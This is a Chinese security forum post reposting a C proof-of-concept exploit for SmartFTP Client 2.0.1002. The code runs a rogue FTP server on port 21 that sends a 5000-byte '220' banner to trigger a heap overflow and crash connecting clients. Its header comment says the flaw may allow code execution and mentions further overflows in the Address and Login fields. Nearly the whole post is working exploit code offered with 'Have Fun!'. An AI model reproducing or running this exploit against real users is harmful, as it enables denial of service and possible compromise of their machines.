‹‹ 上一主题 | 下一主题 ››
发新话题
打印

SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit

pub!1c

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3926 
精华
128 
积分
209876 
阅读权限
200 
性别
男 
在线时间
1107 小时 
注册时间
2007-10-23 
最后登录
2008-8-29 

资料收集奖 运营支持奖

楼主 发表于 2007-2-7 09:44  只看该作者

SmartFTP Client 2.0.1002 Remote Heap Overflow DoS Exploit

复制内容到剪贴板
代码:
/***************************************************************************
*          SmartFTP Client v 2.0.1002 Heap Overflow DoS           *
*                                                  *
*                                                  *
* There is remote heap overflow in SmartFTP. When the app receives a long  *
* banner (5000 char) the heap is smashed, leading to DoS and to code     *
* execution.                                          *
*                                                  *
* There are also two buffer overflow in the fields Address and Login.    *
* I've reported this to Secunia but it seems they didn't think it was dan- *
* gerous cause they didn't publish anything about. However a simple drag'n *
* drop could compromise your system...                         *
*                                                  *
* Have Fun!                                           *
*                                                  *
* Coded by Marsu <[email]Marsupilamipowa@hotmail.fr[/email]>                    *
***************************************************************************/



#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{

  char evilbuff[5000];
  sockaddr_in sin;
  int server,client;
  WSADATA wsaData;
  WSAStartup(MAKEWORD(1,1), &wsaData);

  server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  sin.sin_family = PF_INET;
  sin.sin_addr.s_addr = htonl(INADDR_ANY);
  sin.sin_port = htons( 21 );
  bind(server,(SOCKADDR*)&sin,sizeof(sin));
  printf("[*] Listening on port 21...\n");
  listen(server,5);
  printf("[*] Waiting for client ...\n");
  client=accept(server,NULL,NULL);
  printf("[+] Client connected\n");

  memset(evilbuff,&#39;A&#39;,5000);
  memcpy(evilbuff,"220 ",4);
  memcpy(evilbuff+4997,"\r\n\0",3);

  if (send(client,evilbuff,strlen(evilbuff),0)==-1)
  {
    printf("[-] Error in send!\n");
    exit(-1);
  }
  printf("[+] Data sent\n");

  Sleep(1500);

  if (send(client,"boom?",5,0)==-1)
     printf("[+] Crashed? Crashed!\n");
  else
    printf("[-] Exploit failed!\n");

  return 0;
}

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题